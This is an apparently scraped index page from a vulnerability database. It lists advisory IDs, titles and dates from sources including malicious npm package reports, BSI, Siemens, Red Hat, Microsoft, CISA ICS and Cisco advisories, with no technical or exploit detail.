mal-2024-10903 Malicious code in clarity-vs-code-web-client (npm) 2024-11-24T23:51:51Z 2024-12-05T00:35:14Z
mal-2024-10902 Malicious code in clarity-lsp (npm) 2024-11-25T00:20:45Z 2024-12-05T00:35:14Z
mal-2024-10562 Malicious code in mongoose-4 (npm) 2024-11-08T14:24:20Z 2024-12-05T00:35:14Z
mal-2024-10560 Malicious code in immutable-axelar-bridge (npm) 2024-11-07T23:29:15Z 2024-12-05T00:35:14Z
mal-2024-10559 Malicious code in embrace-helloworld (npm) 2024-11-08T11:40:54Z 2024-12-05T00:35:14Z
mal-2024-10558 Malicious code in dancer-pipeline (npm) 2024-11-08T13:15:53Z 2024-12-05T00:35:14Z
mal-2024-10557 Malicious code in com.immutable.orderbook (npm) 2024-11-08T00:08:13Z 2024-12-05T00:35:14Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
wid-sec-w-2025-1928 Linux UDisks Daemon: Schwachstelle ermöglicht Privilegieneskalation 2025-08-28T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1921 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-08-27T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1906 ImageMagick: Mehrere Schwachstellen 2025-08-25T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1870 Keycloak: Schwachstelle ermöglicht Versand beliebiger E-Mails 2025-08-19T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1857 Firebird: Mehrere Schwachstellen 2025-08-17T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1842 PostgreSQL: Mehrere Schwachstellen 2025-08-14T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1830 http/2 Implementierungen: Schwachstelle ermöglicht Denial of Service 2025-08-13T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1748 libarchive: Schwachstelle ermöglicht Denial of Service und potenziell Codeausführung 2025-08-07T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1679 Linux Kernel: Schwachstelle ermöglicht Manipulation und Dos 2025-07-29T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1672 Apple macOS Sequoia, Sonoma und Ventura: Mehrere Schwachstellen 2025-07-29T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1665 Linux Kernel: Mehrere Schwachstellen 2025-07-28T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1664 Python: Schwachstelle ermöglicht Denial of Service 2025-07-28T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1653 Linux Kernel: Mehrere Schwachstellen 2025-07-27T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1620 Linux Kernel: Schwachstelle ermöglicht Denial of Service 2025-07-21T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1613 Linux Kernel: Mehrere Schwachstellen 2025-07-20T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1596 Linux Kernel: Schwachstelle ermöglicht Denial of Service und nicht spezifizierten Angriff 2025-07-17T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1590 7-Zip: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-17T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1540 Apache Commons Lang: Schwachstelle ermöglicht Denial of Service 2025-07-13T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1522 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-09T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1517 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-08T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1502 AMD Prozessor: Mehrere Schwachstellen ermöglichen Offenlegung von Informationen 2025-07-08T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1485 Microsoft Developer Tools und git: Mehrere Schwachstellen 2025-07-08T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1481 Linux Kernel: Mehrere Schwachstellen 2025-07-07T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1480 Red Hat Enterprise Linux (jq): Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-07T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1470 Python (CPython): Schwachstelle ermöglicht Denial of Service 2025-07-07T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1468 Apache Tomcat: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-07T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1465 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-06T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1461 Linux Kernel: Mehrere Schwachstellen ermöglichen Denial of Service 2025-07-03T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1452 Linux Kernel: Mehrere Schwachstellen 2025-07-02T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
wid-sec-w-2025-1433 Red Hat Enterprise Linux (python-setuptools): Schwachstelle ermöglicht Codeausführung 2025-06-30T22:00:00.000+00:00 2025-08-31T22:00:00.000+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
ssa-707630 SSA-707630: Multiple Vulnerabilities in SIMATIC RTLS Locating Manager Before V3.3 2025-08-12T00:00:00Z 2025-08-26T00:00:00Z
ssa-201595 SSA-201595: Privilege Escalation Vulnerability in WIBU CodeMeter Runtime Affecting the Desigo CC Product Family and SENTRON Powermanager 2025-08-14T00:00:00Z 2025-08-19T00:00:00Z
ssa-711309 SSA-711309: Denial of Service Vulnerability in the OPC UA Implementations of SIMATIC Products 2023-09-12T00:00:00Z 2025-08-18T00:00:00Z
ssa-395458 SSA-395458: Account Hijacking Vulnerability in Mendix SAML Module 2025-08-14T00:00:00Z 2025-08-14T00:00:00Z
ssa-028723 SSA-028723: Multiple OpenSSL Vulnerabilities in BFCClient Before V2.17 2025-08-12T00:00:00Z 2025-08-13T00:00:00Z
ssa-994087 SSA-994087: Multiple SQLite Vulnerabilities in RUGGEDCOM CROSSBOW Station Access Controller Before V5.7 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-978177 SSA-978177: Vulnerability in Nozomi Guardian/CMC on RUGGEDCOM APE1808 Devices 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-914892 SSA-914892: Race Condition Vulnerability in Basic Authentication Implementation of Mendix Runtime 2024-11-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-908185 SSA-908185: Mirror Port Isolation Vulnerability in RUGGEDCOM ROS Devices 2023-08-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-894058 SSA-894058: Improper Bandwidth Limitation of Network Packets Over Local USB Port Vulnerability in SIPROTEC 5 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-864900 SSA-864900: Multiple Vulnerabilities in Fortigate NGFW on RUGGEDCOM APE1808 Devices 2025-05-13T00:00:00Z 2025-08-12T00:00:00Z
ssa-856721 SSA-856721: Vulnerability in RUGGEDCOM Discovery Protocol (RCDP) of Industrial Communication Devices 2017-09-28T00:00:00Z 2025-08-12T00:00:00Z
ssa-840800 SSA-840800: Code Injection Vulnerability in RUGGEDCOM ROS 2022-07-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-800126 SSA-800126: Deserialization Vulnerability in Siemens Engineering Platforms before V20 2024-12-10T00:00:00Z 2025-08-12T00:00:00Z
ssa-794185 SSA-794185: RADIUS Protocol Susceptible to Forgery Attacks (CVE-2024-3596) - Impact to SIPROTEC, SICAM and Related Products 2025-05-13T00:00:00Z 2025-08-12T00:00:00Z
ssa-787941 SSA-787941: Denial of Service Vulnerability in RUGGEDCOM ROS devices 2022-11-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-770902 SSA-770902: Denial of Service Vulnerability in the Web Server of RUGGEDCOM ROS Devices 2023-08-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-770770 SSA-770770: Multiple Vulnerabilities in Fortigate NGFW Before V7.4.7 on RUGGEDCOM APE1808 Devices 2025-02-11T00:00:00Z 2025-08-12T00:00:00Z
ssa-769791 SSA-769791: Local Arbitrary Code Execution Vulnerability in COMOS Before V10.6 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-767615 SSA-767615: Information Disclosure Vulnerability in SIPROTEC 5 Devices 2025-02-11T00:00:00Z 2025-08-12T00:00:00Z
ssa-764417 SSA-764417: Weak Encryption Vulnerability in RUGGEDCOM ROS Devices 2022-03-08T00:00:00Z 2025-08-12T00:00:00Z
ssa-693808 SSA-693808: Deserialization Vulnerability in Siemens Engineering Platforms 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-687955 SSA-687955: Accessible Development Shell via Physical Interface in SIPROTEC 5 2025-02-11T00:00:00Z 2025-08-12T00:00:00Z
ssa-674084 SSA-674084: File Parsing Vulnerabilities in Simcenter Femap Before V2506 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-665108 SSA-665108: Arbitrary File Upload Vulnerability in RUGGEDCOM ROX II 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-613116 SSA-613116: Multiple Vulnerabilities in Third-Party Components in SINEC OS before V3.1 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-529291 SSA-529291: Information Disclosure Vulnerabilities in SICAM Q100/Q200 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-517338 SSA-517338: Multiple Vulnerabilities in SINEC Traffic Analyzer Before V3.0 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-493787 SSA-493787: Arbitrary Code Execution Vulnerability in SIMATIC RTLS Locating Manager Before V3.2 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
ssa-493396 SSA-493396: Deserialization Vulnerability in Siemens Engineering Platforms 2025-08-12T00:00:00Z 2025-08-12T00:00:00Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
rhsa-2024:0302 Red Hat Security Advisory: Kube Descheduler Operator for Red Hat OpenShift 5.0.0 for RHEL 9:security update 2024-03-06T13:33:21+00:00 2025-09-01T21:27:49+00:00
rhsa-2024:10813 Red Hat Security Advisory: OpenShift Container Platform 4.13.54 bug fix and security update 2024-12-12T02:08:06+00:00 2025-09-01T21:27:48+00:00
rhsa-2024:10523 Red Hat Security Advisory: OpenShift Container Platform 4.14.42 bug fix and security update 2024-12-05T00:33:01+00:00 2025-09-01T21:27:43+00:00
rhsa-2024:0766 Red Hat Security Advisory: OpenShift Container Platform 4.15.0 security update 2024-02-28T08:10:56+00:00 2025-09-01T21:27:37+00:00
rhsa-2024:0269 Red Hat Security Advisory: Run Once Duration Override Operator for Red Hat OpenShift 1.1.0 for RHEL 9 2024-02-28T00:20:04+00:00 2025-09-01T21:27:33+00:00
rhsa-2024:4118 Red Hat Security Advisory: Red Hat Ceph Storage 5.3 security, bug fix, and enhancement update 2024-06-26T10:05:24+00:00 2025-09-01T21:27:28+00:00
rhsa-2024:10142 Red Hat Security Advisory: OpenShift Container Platform 4.15.39 bug fix and security update 2024-11-26T11:17:01+00:00 2025-09-01T21:27:28+00:00
rhsa-2024:0741 Red Hat Security Advisory: OpenShift Container Platform 4.13.33 bug fix and security update 2024-02-14T06:34:01+00:00 2025-09-01T21:27:21+00:00
rhsa-2024:0290 Red Hat Security Advisory: OpenShift Container Platform 4.14.10 bug fix and security update 2024-01-23T20:26:08+00:00 2025-09-01T21:27:18+00:00
rhsa-2024:3927 Red Hat Security Advisory: Red Hat Ceph Storage 7.1 container image security, and bug fix update 2024-06-13T14:24:58+00:00 2025-09-01T21:27:17+00:00
rhsa-2024:1037 Red Hat Security Advisory: OpenShift Container Platform 4.13.36 bug fix and security update 2024-03-06T14:46:43+00:00 2025-09-01T21:27:16+00:00
rhsa-2024:0682 Red Hat Security Advisory: OpenShift Container Platform 4.11.58 bug fix and security update 2024-02-08T18:42:42+00:00 2025-09-01T21:27:06+00:00
rhsa-2024:1052 Red Hat Security Advisory: OpenShift Container Platform 4.12.51 bug fix and security update 2024-03-06T00:38:22+00:00 2025-09-01T21:27:04+00:00
rhsa-2024:0198 Red Hat Security Advisory: OpenShift Container Platform 4.12.47 security update 2024-01-17T18:20:55+00:00 2025-09-01T21:27:04+00:00
rhsa-2024:1765 Red Hat Security Advisory: OpenShift Container Platform 4.14.21 bug fix and security update 2024-04-18T11:58:59+00:00 2025-09-01T21:27:03+00:00
rhsa-2025:4240 Red Hat Security Advisory: Updated 6.1 container image is now available in the Red Hat Ecosystem Catalog. 2025-04-28T05:29:21+00:00 2025-09-01T21:27:02+00:00
rhsa-2023:7470 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 bug fix and security update 2023-11-29T11:36:57+00:00 2025-09-01T21:26:59+00:00
rhsa-2023:7691 Red Hat Security Advisory: OpenShift Container Platform 4.11.55 bug fix and security update 2023-12-13T21:44:50+00:00 2025-09-01T21:26:56+00:00
rhsa-2023:7608 Red Hat Security Advisory: OpenShift Container Platform 4.12.45 bug fix and security update 2023-12-06T17:55:11+00:00 2025-09-01T21:26:56+00:00
rhsa-2024:0946 Red Hat Security Advisory: OpenShift Container Platform 4.13.35 security update 2024-02-28T14:03:56+00:00 2025-09-01T21:26:52+00:00
rhsa-2025:1746 Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.1.9 on RHEL 7 security update 2025-02-24T00:08:27+00:00 2025-09-01T21:26:51+00:00
rhsa-2024:1770 Red Hat Security Advisory: OpenShift Container Platform 4.15.9 bug fix and security update 2024-04-16T14:52:58+00:00 2025-09-01T21:26:51+00:00
rhsa-2024:0664 Red Hat Security Advisory: OpenShift Container Platform 4.12.49 bug fix update and security update 2024-02-08T19:31:18+00:00 2025-09-01T21:26:51+00:00
rhsa-2024:0193 Red Hat Security Advisory: OpenShift Container Platform 4.13.29 bug fix and security update 2024-01-17T09:48:09+00:00 2025-09-01T21:26:51+00:00
rhsa-2023:7469 Red Hat Security Advisory: OpenShift Container Platform 4.14.4 security and extras update 2023-11-29T10:27:24+00:00 2025-09-01T21:26:49+00:00
rhsa-2023:7690 Red Hat Security Advisory: OpenShift Container Platform 4.11.55 security update 2023-12-13T21:03:30+00:00 2025-09-01T21:26:47+00:00
rhsa-2023:7607 Red Hat Security Advisory: OpenShift Container Platform 4.12.45 security and extras update 2023-12-06T16:54:41+00:00 2025-09-01T21:26:47+00:00
rhsa-2024:0941 Red Hat Security Advisory: OpenShift Container Platform 4.14.14 bug fix and security update 2024-02-28T00:21:13+00:00 2025-09-01T21:26:40+00:00
rhsa-2024:0273 Red Hat Security Advisory: OpenShift Virtualization 4.12.9 Images security and bug fix update 2024-01-17T08:29:36+00:00 2025-09-01T21:26:40+00:00
rhsa-2025:1747 Red Hat Security Advisory: Red Hat JBoss Enterprise Application Platform 7.3.12 security update 2025-02-24T00:08:38+00:00 2025-09-01T21:26:39+00:00
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
msrc_cve-2025-55231 Windows Storage-based Management Service Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-26T07:00:00.000Z
msrc_cve-2025-55230 Windows MBT Transport Driver Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-26T07:00:00.000Z
msrc_cve-2025-55229 Windows Certificate Spoofing Vulnerability 2025-08-12T07:00:00.000Z 2025-08-26T07:00:00.000Z
msrc_cve-2025-53795 Microsoft PC Manager Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-21T07:00:00.000Z
msrc_cve-2025-53763 Azure Databricks Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-21T07:00:00.000Z
msrc_cve-2025-49718 Microsoft SQL Server Information Disclosure Vulnerability 2025-07-08T07:00:00.000Z 2025-08-20T07:00:00.000Z
msrc_cve-2025-49717 Microsoft SQL Server Remote Code Execution Vulnerability 2025-07-08T07:00:00.000Z 2025-08-20T07:00:00.000Z
msrc_cve-2025-53740 Microsoft Office Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-18T07:00:00.000Z
msrc_cve-2025-49716 Windows Netlogon Denial of Service Vulnerability 2025-07-08T07:00:00.000Z 2025-08-18T07:00:00.000Z
msrc_cve-2025-53786 Microsoft Exchange Server Hybrid Deployment Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-13T07:00:00.000Z
msrc_cve-2025-53760 Microsoft SharePoint Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-13T07:00:00.000Z
msrc_cve-2025-53793 Azure Stack Hub Information Disclosure Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53789 Windows StateRepository API Server file Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53788 Windows Subsystem for Linux (WSL2) Kernel Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53784 Microsoft Word Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53783 Microsoft Teams Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53781 Azure Virtual Machines Information Disclosure Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53779 Windows Kerberos Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53778 Windows NTLM Elevation of Privilege Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53773 GitHub Copilot and Visual Studio Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53772 Web Deploy Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53769 Windows Security App Spoofing Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53766 GDI+ Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53765 Azure Stack Hub Information Disclosure Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53761 Microsoft PowerPoint Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53759 Microsoft Excel Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53741 Microsoft Excel Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53739 Microsoft Excel Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53738 Microsoft Word Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
msrc_cve-2025-53737 Microsoft Excel Remote Code Execution Vulnerability 2025-08-12T07:00:00.000Z 2025-08-12T07:00:00.000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
icsa-25-238-01 INVT VT-Designer and HMITool 2025-08-26T06:00:00.000000Z 2025-08-26T06:00:00.000000Z
icsa-25-140-03 Danfoss AK-SM 8xxA Series (Update A) 2025-05-20T06:00:00.000000Z 2025-08-26T06:00:00.000000Z
icsma-25-233-01 FUJIFILM Healthcare Americas Synapse Mobility 2025-08-21T06:00:00.000000Z 2025-08-21T06:00:00.000000Z
icsa-25-233-01 Mitsubishi Electric Corporation MELSEC iQ-F Series CPU module 2025-08-21T06:00:00.000000Z 2025-08-21T06:00:00.000000Z
icsa-25-177-01 Mitsubishi Electric Air Conditioning Systems (Update A) 2025-06-26T06:00:00.000000Z 2025-08-21T06:00:00.000000Z
icsa-25-219-07 EG4 Electronics EG4 Inverters (Update A) 2025-08-07T06:00:00.000000Z 2025-08-19T06:00:00.000000Z
icsa-25-217-02 Tigo Energy Cloud Connect Advanced (Update A) 2025-08-05T06:00:00.000000Z 2025-08-19T06:00:00.000000Z
icsa-25-226-30 Rockwell Automation FactoryTalk Action Manager 2025-08-14T06:00:00.000000Z 2025-08-15T06:00:00.000000Z
icsa-25-226-31 Rockwell Automation 1756-ENT2R, 1756-EN4TR, 1756-EN4TRXT 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-29 Rockwell Automation Studio 5000 Logix Designer 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-28 Rockwell Automation ControlLogix Ethernet Modules 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-27 Rockwell Automation ArmorBlock 5000 I/O - Webserver 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-26 Rockwell Automation FLEX 5000 I/O 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-25 Rockwell Automation Micro800 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-24 Rockwell FactoryTalk Linx 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-226-23 Rockwell Automation FactoryTalk Viewpoint 2025-08-14T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsa-25-212-01 Güralp Systems FMUS Series and MIN Series Devices (Update A) 2025-07-31T06:00:00.000000Z 2025-08-14T06:00:00.000000Z
icsma-25-224-01 Santesoft Sante PACS Server 2025-08-12T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-25-224-04 AVEVA PI Integrator 2025-08-12T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-25-224-03 Schneider Electric EcoStruxure Power Monitoring Expert 2025-08-12T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-25-224-01 Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, Cobalt Share 2025-08-12T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-25-219-02 Johnson Controls iSTAR Ultra, iSTAR Ultra SE, iSTAR Ultra G2, iSTAR Ultra G2 SE, iSTAR Edge G2 2025-08-12T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-25-191-10 End-of-Train and Head-of-Train Remote Linking Protocol (Update A) 2025-07-10T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
icsa-24-263-04 MegaSys Computer Technologies Telenium Online Web Application (Update A) 2024-09-19T06:00:00.000000Z 2025-08-12T06:00:00.000000Z
va-25-219-01 Tyler Technologies ERP Pro 9 2025-08-07T00:00:00Z 2025-08-07T00:00:00Z
icsa-25-217-01 Mitsubishi Electric Iconics Digital Solutions Multiple Products 2025-08-05T06:00:00.000000Z 2025-08-05T06:00:00.000000Z
va-25-174-01 FOIAXpress Public Access Link (PAL) multiple vulnerabilities 2025-07-31T17:01:09Z 2025-07-31T17:01:09Z
icsa-25-210-03 Delta Electronics DTN Soft 2025-07-29T06:00:00.000000Z 2025-07-29T06:00:00.000000Z
icsa-25-210-02 Samsung HVAC DMS 2025-07-29T06:00:00.000000Z 2025-07-29T06:00:00.000000Z
icsa-25-210-01 National Instruments LabVIEW 2025-07-29T06:00:00.000000Z 2025-07-29T06:00:00.000000Z
Vulnerabilities are sorted by update time (recent to old).
ID Description Published Updated
cisco-sa-ucs-xss-ey6xhyps Cisco UCS Manager Software Stored Cross-Site Scripting Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-vkvmorv-cnkrv7hk Cisco Integrated Management Controller Virtual Keyboard Video Monitor Open Redirect Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-multi-cmdinj-e4ukjyrz Cisco UCS Manager Software Command Injection Vulnerabilities 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ucs-kvmsxss-6h7anuyk Cisco Integrated Management Controller Virtual Keyboard Video Monitor Stored Cross-Site Scripting Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxospc-pim6-vg4jfph Cisco Nexus 3000 and 9000 Series Switches Protocol Independent Multicast Version 6 Denial of Service Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxos-infodis-tectysfg Cisco NX-OS Software Sensitive Log Information Disclosure Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nxos-cmdinj-qhnze5ss Cisco NX-OS Software Command Injection Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nshs-urapi-gjubvfpu Cisco Nexus Dashboard and Nexus Dashboard Fabric Controller Unauthorized REST API Vulnerabilities 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-nd-ptrs-xu2fm2wb Cisco Nexus Dashboard Path Traversal Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-n39k-isis-dos-jhja8rfx Cisco Nexus 3000 and 9000 Series Switches Intermediate System-to-Intermediate System Denial of Service Vulnerability 2025-08-27T16:00:00+00:00 2025-08-27T16:00:00+00:00
cisco-sa-ise-file-upload-qksx6c8g Cisco Identity Services Engine Arbitrary File Upload Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:43:01+00:00
cisco-sa-pi-epnm-tet4gxbx Cisco Evolved Programmable Network Manager and Cisco Prime Infrastructure Sensitive Information Disclosure Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:00:00+00:00
cisco-sa-authproxlog-sxczxq63 Cisco Duo Authentication Proxy Information Disclosure Vulnerability 2025-08-20T16:00:00+00:00 2025-08-20T16:00:00+00:00
cisco-sa-20180328-smi2 Cisco IOS and IOS XE Software Smart Install Remote Code Execution Vulnerability 2018-03-28T16:00:00+00:00 2025-08-20T14:26:26+00:00
cisco-sa-asaftd-ssltls-dos-ehw76vze Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software SSL/TLS Certificate Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-19T16:32:05+00:00
cisco-sa-ftd-ravpn-geobypass-9h38m37z Cisco Secure Firewall Threat Defense Software Geolocation Remote Access VPN Bypass Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-ftd-dos-svkhtjgt Cisco Secure Firewall Threat Defense Software Snort 3 Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fp2k-ipsec-dos-tjwgdzco Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software for Firepower 2100 Series IPv6 over IPsec Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-xss-jtnmcusp Cisco Secure Firewall Management Center Software Cross-Site Scripting Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-xpathinj-corthdmb Cisco Secure Firewall Management Center Software XPATH Injection Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-radius-rce-tnbkf79 Cisco Secure Firewall Management Center Software RADIUS Remote Code Execution Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-html-inj-mqjrzrny Cisco Secure Firewall Management Center Software HTML Injection Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-ftd-cmdinj-phe7kmt Cisco Secure Firewall Management Center and Secure Firewall Threat Defense Software Command Injection Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-cmd-inj-hcrlpfyn Cisco Secure Firewall Management Center Software Command Injection Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-fmc-authz-bypass-m7xhnau Cisco Secure Firewall Management Center Software Authorization Bypass Vulnerabilities 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-asaftd-vpnwebs-dos-hjbhmbsx Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software Remote Access VPN Web Server Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-asaftd-vpn-dos-mfpeka6e Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software Remote Access SSL VPN Denial of Service Vulnerabilities 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
cisco-sa-asaftd-nat-dns-dos-bqhynhtm Cisco Secure Firewall Adaptive Security Appliance and Secure Firewall Threat Defense Software Network Address Translation DNS Inspection Denial of Service Vulnerability 2025-08-14T16:00:00+00:00 2025-08-14T16:00:00+00:00
